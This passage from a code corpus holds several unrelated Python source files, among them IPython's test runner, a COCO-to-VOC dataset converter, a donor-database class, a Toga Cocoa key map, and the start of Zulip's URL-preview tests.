Out[3]: True\n\n \"\"\"\n try:\n check = import_item(item)\n except (ImportError, RuntimeError):\n # GTK reports Runtime error if it can't be initialized even if it's\n # importable.\n return False\n else:\n if min_version:\n if callback:\n # extra processing step to get version to compare\n check = callback(check)\n\n return check >= min_version\n else:\n return True\n\n# Global dict where we can store information on what we have and what we don't\n# have available at test run time\nhave = {'matplotlib': test_for('matplotlib'),\n 'pygments': test_for('pygments'),\n 'sqlite3': test_for('sqlite3')}\n\n#-----------------------------------------------------------------------------\n# Test suite definitions\n#-----------------------------------------------------------------------------\n\ntest_group_names = ['core',\n 'extensions', 'lib', 'terminal', 'testing', 'utils',\n ]\n\nclass TestSection(object):\n def __init__(self, name, includes):\n self.name = name\n self.includes = includes\n self.excludes = []\n self.dependencies = []\n self.enabled = True\n \n def exclude(self, module):\n if not module.startswith('IPython'):\n module = self.includes[0] + \".\" + module\n self.excludes.append(module.replace('.', os.sep))\n \n def requires(self, *packages):\n self.dependencies.extend(packages)\n \n @property\n def will_run(self):\n return self.enabled and all(have[p] for p in self.dependencies)\n\n# Name -> (include, exclude, dependencies_met)\ntest_sections = {n:TestSection(n, ['IPython.%s' % n]) for n in test_group_names}\n\n\n# Exclusions and dependencies\n# ---------------------------\n\n# core:\nsec = test_sections['core']\nif not have['sqlite3']:\n sec.exclude('tests.test_history')\n sec.exclude('history')\nif not have['matplotlib']:\n sec.exclude('pylabtools'),\n sec.exclude('tests.test_pylabtools')\n\n# lib:\nsec = test_sections['lib']\nsec.exclude('kernel')\nif not have['pygments']:\n sec.exclude('tests.test_lexers')\n# We do this unconditionally, so that the test suite doesn't import\n# gtk, changing the default encoding and masking some unicode bugs.\nsec.exclude('inputhookgtk')\n# We also do this unconditionally, because wx can interfere with Unix signals.\n# There are currently no tests for it anyway.\nsec.exclude('inputhookwx')\n# Testing inputhook will need a lot of thought, to figure out\n# how to have tests that don't lock up with the gui event\n# loops in the picture\nsec.exclude('inputhook')\n\n# testing:\nsec = test_sections['testing']\n# These have to be skipped on win32 because they use echo, rm, cd, etc.\n# See ticket https://github.com/ipython/ipython/issues/87\nif sys.platform == 'win32':\n sec.exclude('plugin.test_exampleip')\n sec.exclude('plugin.dtexample')\n\n# don't run jupyter_console tests found via shim\ntest_sections['terminal'].exclude('console')\n\n# extensions:\nsec = test_sections['extensions']\n# This is deprecated in favour of rpy2\nsec.exclude('rmagic')\n# autoreload does some strange stuff, so move it to its own test section\nsec.exclude('autoreload')\nsec.exclude('tests.test_autoreload')\ntest_sections['autoreload'] = TestSection('autoreload',\n ['IPython.extensions.autoreload', 'IPython.extensions.tests.test_autoreload'])\ntest_group_names.append('autoreload')\n\n\n#-----------------------------------------------------------------------------\n# Functions and classes\n#-----------------------------------------------------------------------------\n\ndef check_exclusions_exist():\n from IPython.paths import get_ipython_package_dir\n from warnings import warn\n parent = os.path.dirname(get_ipython_package_dir())\n for sec in test_sections:\n for pattern in sec.exclusions:\n fullpath = pjoin(parent, pattern)\n if not os.path.exists(fullpath) and not glob.glob(fullpath + '.*'):\n warn(\"Excluding nonexistent file: %r\" % pattern)\n\n\nclass ExclusionPlugin(Plugin):\n \"\"\"A nose plugin to effect our exclusions of files and directories.\n \"\"\"\n name = 'exclusions'\n score = 3000 # Should come before any other plugins\n \n def __init__(self, exclude_patterns=None):\n \"\"\"\n Parameters\n ----------\n\n exclude_patterns : sequence of strings, optional\n Filenames containing these patterns (as raw strings, not as regular\n expressions) are excluded from the tests.\n \"\"\"\n self.exclude_patterns = exclude_patterns or []\n super(ExclusionPlugin, self).__init__()\n\n def options(self, parser, env=os.environ):\n Plugin.options(self, parser, env)\n \n def configure(self, options, config):\n Plugin.configure(self, options, config)\n # Override nose trying to disable plugin.\n self.enabled = True\n \n def wantFile(self, filename):\n \"\"\"Return whether the given filename should be scanned for tests.\n \"\"\"\n if any(pat in filename for pat in self.exclude_patterns):\n return False\n return None\n\n def wantDirectory(self, directory):\n \"\"\"Return whether the given directory should be scanned for tests.\n \"\"\"\n if any(pat in directory for pat in self.exclude_patterns):\n return False\n return None\n\n\nclass StreamCapturer(Thread):\n daemon = True # Don't hang if main thread crashes\n started = False\n def __init__(self, echo=False):\n super(StreamCapturer, self).__init__()\n self.echo = echo\n self.streams = []\n self.buffer = BytesIO()\n self.readfd, self.writefd = os.pipe()\n self.buffer_lock = Lock()\n self.stop = Event()\n\n def run(self):\n self.started = True\n\n while not self.stop.is_set():\n chunk = os.read(self.readfd, 1024)\n\n with self.buffer_lock:\n self.buffer.write(chunk)\n if self.echo:\n sys.stdout.write(decode(chunk))\n\n os.close(self.readfd)\n os.close(self.writefd)\n\n def reset_buffer(self):\n with self.buffer_lock:\n self.buffer.truncate(0)\n self.buffer.seek(0)\n\n def get_buffer(self):\n with self.buffer_lock:\n return self.buffer.getvalue()\n\n def ensure_started(self):\n if not self.started:\n self.start()\n\n def halt(self):\n \"\"\"Safely stop the thread.\"\"\"\n if not self.started:\n return\n\n self.stop.set()\n os.write(self.writefd, b'\\0') # Ensure we're not locked in a read()\n self.join()\n\nclass SubprocessStreamCapturePlugin(Plugin):\n name='subprocstreams'\n def __init__(self):\n Plugin.__init__(self)\n self.stream_capturer = StreamCapturer()\n self.destination = os.environ.get('IPTEST_SUBPROC_STREAMS', 'capture')\n # This is ugly, but distant parts of the test machinery need to be able\n # to redirect streams, so we make the object globally accessible.\n nose.iptest_stdstreams_fileno = self.get_write_fileno\n\n def get_write_fileno(self):\n if self.destination == 'capture':\n self.stream_capturer.ensure_started()\n return self.stream_capturer.writefd\n elif self.destination == 'discard':\n return os.open(os.devnull, os.O_WRONLY)\n else:\n return sys.__stdout__.fileno()\n \n def configure(self, options, config):\n Plugin.configure(self, options, config)\n # Override nose trying to disable plugin.\n if self.destination == 'capture':\n self.enabled = True\n \n def startTest(self, test):\n # Reset log capture\n self.stream_capturer.reset_buffer()\n \n def formatFailure(self, test, err):\n # Show output\n ec, ev, tb = err\n captured = self.stream_capturer.get_buffer().decode('utf-8', 'replace')\n if captured.strip():\n ev = safe_str(ev)\n out = [ev, '>> begin captured subprocess output <<',\n captured,\n '>> end captured subprocess output <<']\n return ec, '\\n'.join(out), tb\n\n return err\n \n formatError = formatFailure\n \n def finalize(self, result):\n self.stream_capturer.halt()\n\n\ndef run_iptest():\n \"\"\"Run the IPython test suite using nose.\n\n This function is called when this script is **not** called with the form\n `iptest all`. It simply calls nose with appropriate command line flags\n and accepts all of the standard nose arguments.\n \"\"\"\n # Apply our monkeypatch to Xunit\n if '--with-xunit' in sys.argv and not hasattr(Xunit, 'orig_addError'):\n monkeypatch_xunit()\n\n arg1 = sys.argv[1]\n if arg1 in test_sections:\n section = test_sections[arg1]\n sys.argv[1:2] = section.includes\n elif arg1.startswith('IPython.') and arg1[8:] in test_sections:\n section = test_sections[arg1[8:]]\n sys.argv[1:2] = section.includes\n else:\n section = TestSection(arg1, includes=[arg1])\n \n\n argv = sys.argv + [ '--detailed-errors', # extra info in tracebacks\n # We add --exe because of setuptools' imbecility (it\n # blindly does chmod +x on ALL files). Nose does the\n # right thing and it tries to avoid executables,\n # setuptools unfortunately forces our hand here. This\n # has been discussed on the distutils list and the\n # setuptools devs refuse to fix this problem!\n '--exe',\n ]\n if '-a' not in argv and '-A' not in argv:\n argv = argv + ['-a', '!crash']\n\n if nose.__version__ >= '0.11':\n # I don't fully understand why we need this one, but depending on what\n # directory the test suite is run from, if we don't give it, 0 tests\n # get run. Specifically, if the test suite is run from the source dir\n # with an argument (like 'iptest.py IPython.core', 0 tests are run,\n # even if the same call done in this directory works fine). It appears\n # that if the requested package is in the current dir, nose bails early\n # by default. Since it's otherwise harmless, leave it in by default\n # for nose >= 0.11, though unfortunately nose 0.10 doesn't support it.\n argv.append('--traverse-namespace')\n\n plugins = [ ExclusionPlugin(section.excludes), KnownFailure(),\n SubprocessStreamCapturePlugin() ]\n \n # we still have some vestigial doctests in core\n if (section.name.startswith(('core', 'IPython.core', 'IPython.utils'))):\n plugins.append(IPythonDoctest())\n argv.extend([\n '--with-ipdoctest',\n '--ipdoctest-tests',\n '--ipdoctest-extension=txt',\n ])\n\n \n # Use working directory set by parent process (see iptestcontroller)\n if 'IPTEST_WORKING_DIR' in os.environ:\n os.chdir(os.environ['IPTEST_WORKING_DIR'])\n \n # We need a global ipython running in this process, but the special\n # in-process group spawns its own IPython kernels, so for *that* group we\n # must avoid also opening the global one (otherwise there's a conflict of\n # singletons). Ultimately the solution to this problem is to refactor our\n # assumptions about what needs to be a singleton and what doesn't (app\n # objects should, individual shells shouldn't). But for now, this\n # workaround allows the test suite for the inprocess module to complete.\n if 'kernel.inprocess' not in section.name:\n from IPython.testing import globalipapp\n globalipapp.start_ipython()\n\n # Now nose can run\n TestProgram(argv=argv, addplugins=plugins)\n\nif __name__ == '__main__':\n run_iptest()\n"} {"ext": "py", "sha": "1a302bfb759b8043e0cff31548f78d641a922257", "content": "#DateTimeExample1.py\r\nfrom datetime import *\r\n\r\n#Will print current date and time \r\nprint(\"Current Date Time : \",datetime.now())\r\n\r\n"} {"ext": "py", "sha": "1a302d3e780cbfdb4a4eee3fee3214deb23994e4", "content": "import os\nfrom io import StringIO\nfrom django.contrib.gis.geos import Point\nfrom django.test import TestCase\nfrom uk_geo_utils.models import Onspd\nfrom uk_geo_utils.management.commands.import_onspd import Command\n\n\nclass OnsudImportTest(TestCase):\n\n def test_import_onspd(self):\n # check table is empty before we start\n self.assertEqual(0, Onspd.objects.count())\n\n # path to file we're going to import\n csv_path = os.path.abspath(\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n '../fixtures/onspd'\n )\n )\n\n cmd = Command()\n\n # supress output\n out = StringIO()\n cmd.stdout = out\n\n # import data\n opts = {\n 'path': csv_path,\n }\n cmd.handle(**opts)\n\n # ensure all our tasty data has been imported\n self.assertEqual(4, Onspd.objects.count())\n\n # row with valid grid ref should have valid Point() location\n al11aa = Onspd.objects.filter(pcds=\"AL1 1AA\")[0]\n self.assertEqual(Point(-0.341337, 51.749084, srid=4326), al11aa.location)\n\n # row with invalid grid ref should have NULL location\n im11aa = Onspd.objects.filter(pcds=\"IM1 1AA\")[0]\n self.assertIsNone(im11aa.location)\n"} {"ext": "py", "sha": "1a302da4c6f30789d8399841111880c8b91a2e66", "content": "#!/usr/bin/env python\n# Copyright 2019 Xilinx Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\nimport json\nimport argparse\nimport shutil\n\narg_parser = argparse.ArgumentParser(description=\"This is a script to convert coco anntations to voc-like annotations.\")\narg_parser.add_argument('-ti', '--train_images', type=str, default=\"./coco2014/train2014\", help='where to put coco2014 train images.')\narg_parser.add_argument('-vi', '--val_images', type=str, default='./coco2014/val2014', help='where to put coco2014 val images.')\narg_parser.add_argument('-ta', '--train_anno', type=str, default='./coco2014/instances_train2014.json', help='where to put cooc2014 train set annotations.')\narg_parser.add_argument('-va', '--val_anno', type=str, default='./coco2014/instances_val2014.json', help='where to put coco2014 val set annotations')\narg_parser.add_argument('-tlf', '--tran_list_file', type=str, default='./coco2014/train2014.txt', help='image list for training')\narg_parser.add_argument('-vlf', '--val_list_file', type=str, default='./coco2014/val2014.txt', help='image list for evalution.')\narg_parser.add_argument('-ai', '--all_images', type=str, default='./coco2014/Images', help='where to put all images.')\narg_parser.add_argument('-aa', '--all_anno', type=str, default='./coco2014/Annotations', help='where to put all annotations.')\nargs = arg_parser.parse_args()\n\n'''How to organize coco dataset folder:\n inputs:\n coco2014/\n |->train2014/\n |->val2014/\n |->instances_train2014.json\n |->instances_val2014.json\n\noutputs:\n coco2014/\n |->Annotations/\n |->Images/\n |->train2014.txt\n |->val2014.txt\n'''\n\ndef convert_images_coco2voc(args):\n assert os.path.exists(args.train_images)\n assert os.path.exists(args.val_images)\n os.system('mv ' + args.train_images + ' ' + args.all_images)\n imagename_list = os.listdir(args.val_images)\n for imagename in imagename_list:\n shutil.copy(os.path.join(args.val_images, imagename), args.all_images) \n os.system('rm -r ' + args.val_images)\n\ndef generate_cid_name(json_object):\n id2name_dict = {}\n for ind, category_info in enumerate(json_object['categories']):\n id2name_dict[category_info['id']] = category_info['name']\n return id2name_dict\n\ndef generate_image_dict(json_object): \n id2image_dict = {}\n for ind, image_info in enumerate(json_object['images']):\n id2image_dict[image_info['id']] = image_info['file_name']\n return id2image_dict\n\ndef generate_annotation_files(json_object, annotation_path, id2image_dict, id2name, image_list_file):\n if not os.path.exists(annotation_path):\n os.mkdir(annotation_path)\n f_image = open(image_list_file, 'w')\n all_images_name = []\n for ind, anno_info in enumerate(json_object['annotations']):\n print('preprocess: {}'.format(ind))\n category_id = anno_info['category_id']\n cls_name = id2name[category_id]\n if cls_name != \"person\":\n continue \n image_id = anno_info['image_id']\n image_name = id2image_dict[image_id]\n bbox = anno_info['bbox']\n bbox[2] = bbox[0] + bbox[2]\n bbox[3] = bbox[3] + bbox[1]\n bbox_str = ' '.join([str(int(x)) for x in bbox])\n with open(os.path.join(annotation_path, image_name.split('.')[0] + '.txt'), 'a') as f_anno:\n f_anno.writelines(image_name.split('.')[0] + \" \" + cls_name + \" \" + bbox_str + \"\\n\")\n if image_name not in all_images_name:\n all_images_name.append(image_name)\n for image_name in all_images_name: \n f_image.writelines(image_name.split('.')[0] + \"\\n\")\n f_image.close() \n \ndef convert_anno_coco2voc(coco_anno_file, image_list_file, all_anno_path):\n with open(coco_anno_file, 'r') as f_ann:\n line = f_ann.readlines()\n json_object = json.loads(line[0])\n id2name = generate_cid_name(json_object)\n id2image_dict = generate_image_dict(json_object)\n generate_annotation_files(json_object, all_anno_path, id2image_dict, id2name, image_list_file)\n\ndef convert_anno_all(args):\n convert_anno_coco2voc(args.train_anno, args.tran_list_file, args.all_anno)\n convert_anno_coco2voc(args.val_anno, args.val_list_file, args.all_anno)\n\nif __name__ == \"__main__\":\n convert_anno_all(args)\n convert_images_coco2voc(args)\n"} {"ext": "py", "sha": "1a302defb66f0280aa78784e4c2a5f022f25518d", "content": "#!/usr/bin/env python\n\"\"\"\nmodels for the mailroom program.\n\nThis is where the program logic is.\n\nThis version has been made Object Oriented.\n\"\"\"\n\n# handy utility to make pretty printing easier\nfrom textwrap import dedent\nfrom pathlib import Path\n\nimport json_save.json_save_dec as js\nimport json\n\nfrom . import data_dir\n\n\n@js.json_save\nclass Donor:\n \"\"\"\n class to hold the information about a single donor\n \"\"\"\n name = js.String()\n donations = js.List()\n\n # reference to the DB its in -- this will be set in the instance\n # when added to the DonorDB\n _donor_db = None\n\n def __init__(self, name, donations=None):\n \"\"\"\n create a new Donor object\n\n :param name: the full name of the donor\n\n :param donations=None: iterable of past donations\n \"\"\"\n\n self.norm_name = self.normalize_name(name)\n self.name = name.strip()\n if donations is None:\n self.donations = []\n else:\n self.donations = list(donations)\n\n def __str__(self):\n msg = (f\"Donor: {self.name}, with {self.num_donations:d} \"\n f\"donations, totaling: ${self.total_donations:.2f}\")\n return msg\n\n def mutating(method):\n \"\"\"\n Decorator that saves the DB when a change is made\n\n It should be applied to all mutating methods, so the\n data will be saved whenever it's been changed.\n\n NOTE: This requires that the donor object is in a DonorDB.\n \"\"\"\n\n # note that this is expecting to decorate a method\n # so self will be the first argument\n def wrapped(self, *args, **kwargs):\n print(\"wrapped method called\")\n print(self)\n print(self._donor_db)\n res = method(self, *args, **kwargs)\n if self._donor_db is not None:\n self._donor_db.save()\n return res\n return wrapped\n\n @staticmethod\n def normalize_name(name):\n \"\"\"\n return a normalized version of a name to use as a comparison key\n\n simple enough to not be in a method now, but maybe you'd want to make it fancier later.\n \"\"\"\n return name.lower().strip()\n\n @property\n def last_donation(self):\n \"\"\"\n The most recent donation made\n \"\"\"\n try:\n return self.donations[-1]\n except IndexError:\n return None\n\n @property\n def total_donations(self):\n return sum(self.donations)\n\n @property\n def num_donations(self):\n return len(self.donations)\n\n @property\n def average_donation(self):\n return self.total_donations / self.num_donations\n\n @mutating\n def add_donation(self, amount):\n \"\"\"\n add a new donation\n \"\"\"\n print(\"add_donation called\")\n amount = float(amount)\n if amount <= 0.0:\n raise ValueError(\"Donation must be greater than zero\")\n self.donations.append(amount)\n\n def gen_letter(self):\n \"\"\"\n Generate a thank you letter for the donor\n\n :param: donor tuple\n\n :returns: string with letter\n\n note: This doesn't actually write to a file -- that's a separate\n function. This makes it more flexible and easier to test.\n \"\"\"\n return dedent('''Dear {0:s},\n\n Thank you for your very kind donation of ${1:.2f}.\n It will be put to very good use.\n\n Sincerely,\n -The Team\n '''.format(self.name, self.last_donation)\n )\n\n\n@js.json_save\nclass DonorDB:\n \"\"\"\n Encapsulation of the entire database of donors and data associated with them.\n \"\"\"\n # specify a json_save dict as the data structure for the data.\n donor_data = js.Dict()\n\n _frozen = False\n\n def __init__(self, donors=None, db_file=None):\n \"\"\"\n Initialize a new donor database\n\n :param donors=None: iterable of Donor objects\n\n :param db_file=None: path to file to store the datbase in.\n if None, the data will be stored in the\n package data_dir\n \"\"\"\n if db_file is None:\n self.db_file = data_dir / \"mailroom_data.json\"\n else:\n self.db_file = Path(db_file)\n\n self.donor_data = {}\n\n if donors is not None:\n # you can set _frozen so that it won't save on every change.\n self._frozen = True\n for d in donors:\n self.add_donor(d)\n self.save # save resets _frozen\n\n def mutating(method):\n \"\"\"\n Decorator that saves the DB when a change is made\n\n It should be applied to all mutating methods, so the\n data will be saved whenever it's been changed.\n\n NOTE: This is not very efficient -- it will re-write\n the entire file each time.\n \"\"\"\n\n # note that this is expecting to decorate a method\n # so self will be the first argument\n def wrapped(self, *args, **kwargs):\n res = method(self, *args, **kwargs)\n if not self._frozen:\n self.save()\n return res\n return wrapped\n\n @classmethod\n def load_from_file(cls, filename):\n \"\"\"\n loads a donor database from a raw json file\n NOTE: This is not a json_save format file!\n -- it is a simpler, less flexible format.\n \"\"\"\n with open(filename) as infile:\n donors = json.load(infile)\n db = cls([Donor(*d) for d in donors])\n return db\n\n @classmethod\n def load(cls, filepath):\n \"\"\"\n loads a donor database from a json_save format file.\n \"\"\"\n with open(filepath) as jsfile:\n db = js.from_json(jsfile)\n db.db_file = filepath\n\n def save(self):\n \"\"\"\n Save the data to a json_save file\n \"\"\"\n # if explicitly called, you want to do it!\n self._frozen = False\n with open(self.db_file, 'w') as db_file:\n self.to_json(db_file)\n\n @property\n def donors(self):\n \"\"\"\n an iterable of all the donors\n \"\"\"\n return self.donor_data.values()\n\n def list_donors(self):\n \"\"\"\n creates a list of the donors as a string, so they can be printed\n\n Not calling print from here makes it more flexible and easier to\n test\n \"\"\"\n listing = [\"Donor list:\"]\n for donor in self.donors:\n listing.append(donor.name)\n return \"\\n\".join(listing)\n\n def find_donor(self, name):\n \"\"\"\n find a donor in the donor db\n\n :param: the name of the donor\n\n :returns: The donor data structure -- None if not in the self.donor_data\n \"\"\"\n return self.donor_data.get(Donor.normalize_name(name))\n\n @mutating\n def add_donor(self, donor):\n \"\"\"\n Add a new donor to the donor db\n\n :param donor: A Donor instance, or the name of the donor\n\n :returns: The new or existing Donor object\n \"\"\"\n\n if not isinstance(donor, Donor):\n donor = Donor(donor)\n self.donor_data[donor.norm_name] = donor\n donor._donor_db = self\n return donor\n\n @staticmethod\n def sort_key(item):\n # used to sort on name in self.donor_data\n return item[1]\n\n def generate_donor_report(self):\n \"\"\"\n Generate the report of the donors and amounts donated.\n\n :returns: the donor report as a string.\n \"\"\"\n # First, reduce the raw data into a summary list view\n report_rows = []\n for donor in self.donor_data.values():\n name = donor.name\n gifts = donor.donations\n total_gifts = donor.total_donations\n num_gifts = len(gifts)\n avg_gift = donor.average_donation\n report_rows.append((name, total_gifts, num_gifts, avg_gift))\n\n # sort the report data\n report_rows.sort(key=self.sort_key)\n report = []\n report.append(\"{:25s} | {:11s} | {:9s} | {:12s}\".format(\"Donor Name\",\n \"Total Given\",\n \"Num Gifts\",\n \"Average Gift\"))\n report.append(\"-\" * 66)\n for row in report_rows:\n report.append(\"{:25s} ${:10.2f} {:9d} ${:11.2f}\".format(*row))\n return \"\\n\".join(report)\n\n def save_letters_to_disk(self):\n \"\"\"\n make a letter for each donor, and save it to disk.\n \"\"\"\n print(\"Saving letters:\")\n for donor in self.donor_data.values():\n print(\"donor:\", donor.name)\n letter = donor.gen_letter()\n # I don't like spaces in filenames...\n filename = donor.name.replace(\" \", \"_\") + \".txt\"\n open(filename, 'w').write(letter)\n"} {"ext": "py", "sha": "1a302e27e1fa1d06835c690f86b03d4b5266920b", "content": "from toga import Key\n\nfrom toga_cocoa.libs import (\n NSEventModifierFlagCapsLock,\n NSEventModifierFlagShift,\n NSEventModifierFlagControl,\n NSEventModifierFlagOption,\n NSEventModifierFlagCommand,\n)\n\n######################################################################\n# Utilities to convert Cocoa constants to Toga ones\n######################################################################\n\ndef modified_key(key, shift=None):\n def mod_fn(modifierFlags):\n if modifierFlags & NSEventModifierFlagShift:\n return shift\n return key\n return mod_fn\n\n\ndef toga_key(event):\n \"\"\"Convert a Cocoa NSKeyEvent into a Toga event.\"\"\"\n key = {\n 0: Key.A,\n 1: Key.S,\n 2: Key.D,\n 3: Key.F,\n 4: Key.H,\n 5: Key.G,\n 6: Key.Z,\n 7: Key.X,\n 8: Key.C,\n 9: Key.V,\n 11: Key.B,\n 12: Key.Q,\n 13: Key.W,\n 14: Key.E,\n 15: Key.R,\n 16: Key.Y,\n 17: Key.T,\n 18: modified_key(Key._1, shift=Key.EXCLAMATION)(event.modifierFlags),\n 19: modified_key(Key._2, shift=Key.AT)(event.modifierFlags),\n 20: modified_key(Key._3, shift=Key.HASH)(event.modifierFlags),\n 21: modified_key(Key._4, shift=Key.DOLLAR)(event.modifierFlags),\n 22: modified_key(Key._6, shift=Key.CARET)(event.modifierFlags),\n 23: modified_key(Key._5, shift=Key.PERCENT)(event.modifierFlags),\n 24: modified_key(Key.PLUS, shift=Key.EQUAL)(event.modifierFlags),\n 25: modified_key(Key._9, shift=Key.OPEN_PARENTHESIS)(event.modifierFlags),\n 26: modified_key(Key._7, shift=Key.AND)(event.modifierFlags),\n 27: modified_key(Key.MINUS, shift=Key.UNDERSCORE)(event.modifierFlags),\n 28: modified_key(Key._8, shift=Key.ASTERISK)(event.modifierFlags),\n 29: modified_key(Key._0, shift=Key.CLOSE_PARENTHESIS)(event.modifierFlags),\n 30: Key.CLOSE_BRACKET,\n 31: Key.O,\n 32: Key.U,\n 33: Key.OPEN_BRACKET,\n 34: Key.I,\n 35: Key.P,\n 36: Key.ENTER,\n 37: Key.L,\n 38: Key.J,\n 39: modified_key(Key.QUOTE, shift=Key.DOUBLE_QUOTE)(event.modifierFlags),\n 40: Key.K,\n 41: modified_key(Key.COLON, shift=Key.SEMICOLON)(event.modifierFlags),\n 42: Key.BACKSLASH,\n 43: modified_key(Key.COMMA, shift=Key.LESS_THAN)(event.modifierFlags),\n 44: modified_key(Key.SLASH, shift=Key.QUESTION)(event.modifierFlags),\n 45: Key.N,\n 46: Key.M,\n 47: modified_key(Key.FULL_STOP, shift=Key.GREATER_THAN)(event.modifierFlags),\n 48: Key.TAB,\n 49: Key.SPACE,\n 50: modified_key(Key.BACK_QUOTE, shift=Key.TILDE)(event.modifierFlags),\n 51: Key.BACKSPACE,\n 53: Key.ESCAPE,\n 65: Key.NUMPAD_DECIMAL_POINT,\n 67: Key.NUMPAD_MULTIPLY,\n 69: Key.NUMPAD_PLUS,\n 71: Key.NUMPAD_CLEAR,\n 75: Key.NUMPAD_DIVIDE,\n 76: Key.NUMPAD_ENTER,\n 78: Key.NUMPAD_MINUS,\n 81: Key.NUMPAD_EQUAL,\n 82: Key.NUMPAD_0,\n 83: Key.NUMPAD_1,\n 84: Key.NUMPAD_2,\n 85: Key.NUMPAD_3,\n 86: Key.NUMPAD_4,\n 87: Key.NUMPAD_5,\n 88: Key.NUMPAD_6,\n 89: Key.NUMPAD_7,\n 91: Key.NUMPAD_8,\n 92: Key.NUMPAD_9,\n\n # : Key.F4,\n 96: Key.F5,\n 97: Key.F7,\n 98: Key.F5,\n 99: Key.F3,\n 100: Key.F8,\n 101: Key.F9,\n 109: Key.F9,\n 115: Key.HOME,\n 116: Key.PAGE_UP,\n 117: Key.DELETE,\n 119: Key.END,\n 120: Key.F2,\n 121: Key.PAGE_DOWN,\n 122: Key.F1,\n 123: Key.LEFT,\n 124: Key.RIGHT,\n 125: Key.DOWN,\n 126: Key.UP,\n\n }.get(event.keyCode, None)\n\n modifiers = set()\n\n if event.modifierFlags & NSEventModifierFlagCapsLock:\n modifiers.add(Key.CAPSLOCK)\n if event.modifierFlags & NSEventModifierFlagShift:\n modifiers.add(Key.SHIFT)\n if event.modifierFlags & NSEventModifierFlagControl:\n modifiers.add(Key.CONTROL)\n if event.modifierFlags & NSEventModifierFlagOption:\n modifiers.add(Key.OPTION)\n if event.modifierFlags & NSEventModifierFlagCommand:\n modifiers.add(Key.COMMAND)\n\n return {\n 'key': key,\n 'modifiers': modifiers\n }\n"} {"ext": "py", "sha": "1a302ea2ccac42f1bd5bfe99e4fba91d1cf256e8", "content": "# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport typing\n\n# Use consistent types for marshal and unmarshal functions across\n# both JSON and Binary format.\n\nMarshallerType = typing.Optional[\n typing.Callable[[typing.Any], typing.Union[bytes, str]]\n]\nUnmarshallerType = typing.Optional[\n typing.Callable[[typing.Union[bytes, str]], typing.Any]\n]\n"} {"ext": "py", "sha": "1a302ec1ac0b39ce9c344f0781229746f43ec413", "content": "from typing import Any, Callable, Dict, Optional\nfrom unittest import mock\n\nimport orjson\nfrom django.test import override_settings\nfrom django.utils.html import escape\nfrom requests.exceptions import ConnectionError\n\nfrom zerver.lib.actions import queue_json_publish\nfrom zerver.lib.cache import NotFoundInCache, cache_set, preview_url_cache_key\nfrom zerver.lib.test_classes import ZulipTestCase\nfrom zerver.lib.test_helpers import MockPythonResponse, mock_queue_publish\nfrom zerver.lib.url_preview.oembed import get_oembed_data, strip_cdata\nfrom zerver.lib.url_preview.parsers import GenericParser, OpenGraphParser\nfrom zerver.lib.url_preview.preview import get_link_embed_data, link_embed_data_from_cache\nfrom zerver.models import Message, Realm, UserProfile\nfrom zerver.worker.queue_processors import FetchLinksEmbedData\n\nTEST_CACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'default',\n },\n 'database': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'url-preview',\n },\n 'in-memory': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': 'url-preview',\n },\n}\n\n@override_settings(INLINE_URL_EMBED_PREVIEW=True)\nclass OembedTestCase(ZulipTestCase):\n @mock.patch('pyoembed.requests.get')\n def test_present_provider(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.headers = {'content-type': 'application/json'}\n response.ok = True\n response_data = {\n 'type': 'rich',\n 'thumbnail_url': 'https://scontent.cdninstagram.com/t51.2885-15/n.jpg',\n 'thumbnail_width': 640,\n 'thumbnail_height': 426,\n 'title': 'NASA',\n 'html': '

    test

    ',\n 'version': '1.0',\n 'width': 658,\n 'height': 400}\n response.text = orjson.dumps(response_data).decode()\n url = 'http://instagram.com/p/BLtI2WdAymy'\n data = get_oembed_data(url)\n self.assertIsInstance(data, dict)\n self.assertIn('title', data)\n assert data is not None # allow mypy to infer data is indexable\n self.assertEqual(data['title'], response_data['title'])\n\n @mock.patch('pyoembed.requests.get')\n def test_photo_provider(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.headers = {'content-type': 'application/json'}\n response.ok = True\n response_data = {\n 'type': 'photo',\n 'thumbnail_url': 'https://scontent.cdninstagram.com/t51.2885-15/n.jpg',\n 'url': 'https://scontent.cdninstagram.com/t51.2885-15/n.jpg',\n 'thumbnail_width': 640,\n 'thumbnail_height': 426,\n 'title': 'NASA',\n 'html': '

    test

    ',\n 'version': '1.0',\n 'width': 658,\n 'height': 400}\n response.text = orjson.dumps(response_data).decode()\n url = 'http://imgur.com/photo/158727223'\n data = get_oembed_data(url)\n self.assertIsInstance(data, dict)\n self.assertIn('title', data)\n assert data is not None # allow mypy to infer data is indexable\n self.assertEqual(data['title'], response_data['title'])\n self.assertTrue(data['oembed'])\n\n @mock.patch('pyoembed.requests.get')\n def test_video_provider(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.headers = {'content-type': 'application/json'}\n response.ok = True\n response_data = {\n 'type': 'video',\n 'thumbnail_url': 'https://scontent.cdninstagram.com/t51.2885-15/n.jpg',\n 'thumbnail_width': 640,\n 'thumbnail_height': 426,\n 'title': 'NASA',\n 'html': '

    test

